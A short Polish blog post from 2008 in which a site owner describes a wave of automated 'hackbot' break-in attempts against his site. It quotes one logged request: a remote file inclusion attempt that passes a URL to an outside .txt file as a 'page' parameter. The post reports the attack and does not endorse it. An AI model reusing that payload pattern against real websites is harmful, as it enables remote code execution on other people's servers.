artykuły

Najazd hackbotów

12:30
Sat, 1 November 2008
Ostatnio bardzo zwiększyła się liczba prób włamań do serwisu LHP. Wszystkie takie działania są OK (i wszystkich zachęcam do prób), dopóki nie naruszają one oprogramowania serwera OVH. Możecie wykorzystywać luki w moich skryptach (jeśli je znajdziecie ;) ale nie wolno Wam naruszać integralności serwera OVH (tzn. powodować błędów przepełnienia bufora itp.).
Wszystkie próby szukania dziur w moich skryptach bardzo szanuje, jednak w ostatnim czasie zwiększyła się aktywność - nazwę to - "hackbotów" które przeszukują tysiące stron internetowych w poszukiwaniu częstych luk w zabezpieczeniach (jak niegdyś IncludeBug). Serwis LHP odwiedza najczęściej hackbot działający w opraciu o libwww-perl/5.808 (lub o takiej spreparowanej nazwie). Jedne z jego zapytań wyglądają (przykładowo) następująco:
artykuly/fine_reader_4_sprint-test.php/test.php?page=http://www.carpinteria-mb.com.ar/vnc/mic22.txt??? Wspomnę jedynie, że hackboty (jakby nie patrzeć) generują około 90% wszystkich prób złamania zabezpieczeń (o ile można to tak nazwać) - jakkolwiek dziwnie i śmiesznie by one wyglądały.

Póki co brak wpisów.
12345
Najazd hackbotów Autor opinii: Czytelnicy, data przesłania: 0

Skomentuj

Aby zamieścić komentarz, proszę włączyć JavaScript - niestety roboty spamujące dają mi niezmiernie popalić.


Komentarze czytelników

    Nie ma jeszcze żadnych komentarzy.
    Dexter